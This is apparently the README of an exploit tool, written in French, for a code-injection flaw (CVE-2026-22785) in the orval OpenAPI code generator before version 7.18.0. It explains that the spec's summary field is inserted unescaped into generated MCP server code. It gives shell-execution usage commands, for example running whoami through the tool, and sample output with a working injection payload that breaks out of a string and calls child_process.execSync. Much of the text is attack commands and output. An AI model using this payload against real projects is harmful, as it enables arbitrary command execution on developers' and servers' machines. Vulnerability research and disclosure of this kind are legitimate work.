
Outil d'exploitation pour CVE-2026-22785, une injection de code critique dans orval < 7.18.0. Fournit l'exécution de commandes shell et l'analyse de fichiers pour démontrer la vulnérabilité et vérifier l'injection de payload.
orval < 7.18.0, lors de la génération du code du serveur MCP, concatène directement le champ summary de la spécification OpenAPI dans le modèle sans l'échapper, ce qui entraîne une injection de code.
cd exploit
npm install
# Exécuter une commande (exploitation de la vulnérabilité)
python cve_tool.py shell <commande>
# Exemple
python cve_tool.py shell whoami
python cve_tool.py shell "node --version"
python cve_tool.py shell dir
# Analyser un fichier
python cve_tool.py scan <fichier>
<sortie de la commande>
[+] CVE-2026-22785: Injection du payload réussie
[+] Emplacement de l'injection: server.ts:31
Code généré par server.ts :
server.tool(
'getApiDemo',
'API.' + require('child_process').execSync('whoami', {}),//',
getApiDemoHandler
);